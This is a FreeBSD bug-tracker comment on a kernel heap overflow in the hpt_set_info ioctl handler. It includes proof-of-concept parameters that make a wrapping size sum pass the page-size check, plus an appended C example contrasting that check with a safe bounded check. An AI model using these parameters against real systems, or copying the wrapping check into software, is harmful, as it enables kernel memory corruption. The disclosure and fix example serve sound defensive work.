[Bug 206585] hpt_set_info possible buffer overflow
bugzilla-noreply at freebsd.org
Mon Jan 25 19:38:35 UTC 2016
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=206585
--- Comment #4 from CTurt <ecturt at gmail.com> ---
Supplying the `HPT_IOCTL_GET_EVENT` command will ensure that the
`Kernel_DeviceIoControl` function instantly returns, resulting in
`hpt_set_info` returning straight after doing the `malloc`, `copyin`, and
`free`:

    case HPT_IOCTL_GET_EVENT:
    {
        PHPT_EVENT pInfo;
        if (nInBufferSize!=0) return -1;

I've also refined the `size` related parameters needed to fully control the
heap overflow:

    params.dwIoControlCode = HPT_IOCTL_GET_EVENT;
    params.lpInBuffer = mapping;
    params.nInBufferSize = bufferSize + overflowSize;
    params.lpOutBuffer = NULL;
    params.nOutBufferSize = -overflowSize;
    params.lpBytesReturned = &bytesReturned;

    printf(" [+] nInBufferSize (size copied in): %08x\n", params.nInBufferSize);
    printf(" [+] nOutBufferSize: %08x\n", params.nOutBufferSize);
    printf(" [+] Sum (allocation size): %08x\n",
        params.nInBufferSize + params.nOutBufferSize);
    printf(" [+] Will be accepted: %d\n",
        (params.nInBufferSize + params.nOutBufferSize) <= PAGE_SIZE);

You can get very manageable sizes from this, for example, an allocated
`bufferSize` of `0x500`, and a copy size of `0x1000`.

I'll try to get around to writing a full exploit for this soon, but it won't be
very useful since the vulnerability is only triggerable as `root` anyway.
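Added example, not part of the bug comment or the driver source: the summed size check that the comment's "Will be accepted" line evaluates, next to one overflow-safe form of the same check. It assumes 32-bit unsigned size fields and a 4 KiB page; `EX_PAGE_SIZE` and the function names are hypothetical.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define EX_PAGE_SIZE 4096u /* assumption: 4 KiB pages */

/* Weak form: validate only the 32-bit sum. The sum wraps, so a very
 * large n_out cancels part of n_in and the request passes. */
static bool accepted_wrapping(uint32_t n_in, uint32_t n_out)
{
    return (uint32_t)(n_in + n_out) <= EX_PAGE_SIZE;
}

/* Hardened form: bound n_in first, then bound n_out by the remaining
 * room, so the addition is never performed on values that can wrap. */
static bool accepted_checked(uint32_t n_in, uint32_t n_out)
{
    if (n_in > EX_PAGE_SIZE)
        return false;
    return n_out <= EX_PAGE_SIZE - n_in;
}

/* Bytes by which a copy of n_in exceeds an allocation sized by the
 * wrapped sum (0 when the copy fits). */
static uint32_t copy_excess(uint32_t n_in, uint32_t n_out)
{
    uint32_t alloc = (uint32_t)(n_in + n_out);
    return n_in > alloc ? n_in - alloc : 0u;
}

int main(void)
{
    /* Sizes quoted in the comment: allocation 0x500, copy 0x1000. */
    uint32_t n_in = 0x1000u;
    uint32_t n_out = 0u - 0xb00u; /* same bit pattern as -0xb00 */

    printf("n_in=%08x n_out=%08x sum=%08x\n", (unsigned)n_in,
        (unsigned)n_out, (unsigned)(uint32_t)(n_in + n_out));
    printf("summed check accepts:  %d\n", accepted_wrapping(n_in, n_out));
    printf("bounded check accepts: %d\n", accepted_checked(n_in, n_out));
    printf("copy exceeds allocation by: %#x bytes\n",
        (unsigned)copy_excess(n_in, n_out));
    return 0;
}
```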